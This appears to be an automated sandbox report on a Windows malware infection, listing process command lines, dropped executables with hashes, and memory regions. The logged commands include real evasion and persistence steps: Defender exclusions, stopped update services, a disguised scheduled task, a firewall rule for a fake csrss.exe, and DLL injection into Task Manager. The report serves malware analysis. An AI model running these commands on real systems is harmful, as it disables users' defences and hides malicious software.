C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb67bd46f8,0x7ffb67bd4708,0x7ffb67bd4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb67bd46f8,0x7ffb67bd4708,0x7ffb67bd4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,8913940286012841717,6794354622792834989,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\6013.exe

C:\Users\Admin\AppData\Local\Temp\6013.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\75BF.exe

C:\Users\Admin\AppData\Local\Temp\75BF.exe

C:\Users\Admin\AppData\Local\Temp\79A8.exe

C:\Users\Admin\AppData\Local\Temp\79A8.exe

C:\Users\Admin\AppData\Local\Temp\7B00.exe

C:\Users\Admin\AppData\Local\Temp\7B00.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=79A8.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb67bd46f8,0x7ffb67bd4708,0x7ffb67bd4718

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=79A8.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb67bd46f8,0x7ffb67bd4708,0x7ffb67bd4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6996 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network


Files

SHA512 e2cf633cac4503c415b70ed5240b8d7eb12ee8b43b34306f6d0dac3d25995523e89f74e7535e53a51b19d9b11f0ca1edada98afaa188ae1f3ef784695abdc9bd

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 d555d038867542dfb2fb0575a0d3174e
SHA1 1a5868d6df0b5de26cf3fc7310b628ce0a3726f0
SHA256 044cac379dddf0c21b8e7ee4079d21c67e28795d14e678dbf3e35900f25a1e2e
SHA512 d8220966fe6c3ae4499bc95ab3aead087a3dd915853320648849d2fc123a4acd157b7dba64af0108802522575a822651ecc005523c731423d9131ee679c2712f

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/5580-310-0x0000000000F20000-0x0000000001436000-memory.dmp

memory/5580-306-0x0000000072B70000-0x0000000073320000-memory.dmp

memory/4916-312-0x0000000072B70000-0x0000000073320000-memory.dmp

memory/5580-313-0x0000000005E20000-0x0000000005E30000-memory.dmp

memory/5580-314-0x0000000005FD0000-0x000000000606C000-memory.dmp

memory/5580-315-0x0000000005CE0000-0x0000000005CE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\75BF.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

memory/5396-321-0x00000000024F0000-0x00000000024F9000-memory.dmp

memory/5396-320-0x0000000002560000-0x0000000002660000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\79A8.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

memory/5864-336-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5864-338-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7B00.exe

MD5 1199c88022b133b321ed8e9c5f4e6739
SHA1 8e5668edc9b4e1f15c936e68b59c84e165c9cb07
SHA256 e6bd7a442e04eba451aa1f63819533b086c5a60fd9fa7506fa838515184e1836
SHA512 7aa8c3ed3a2985bb8a62557fd347d1c90790cd3f5e3b0b70c221b28cb17a0c163b8b1bac45bc014148e08105232e9abef33408a4d648ddc5362795e5669e3697

C:\Users\Admin\AppData\Local\Temp\75BF.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

memory/5828-340-0x0000000000870000-0x000000000088E000-memory.dmp

memory/5828-341-0x0000000072B70000-0x0000000073320000-memory.dmp

memory/5708-343-0x0000000000400000-0x000000000046F000-memory.dmp

memory/5780-345-0x00000000001C0000-0x00000000001DE000-memory.dmp

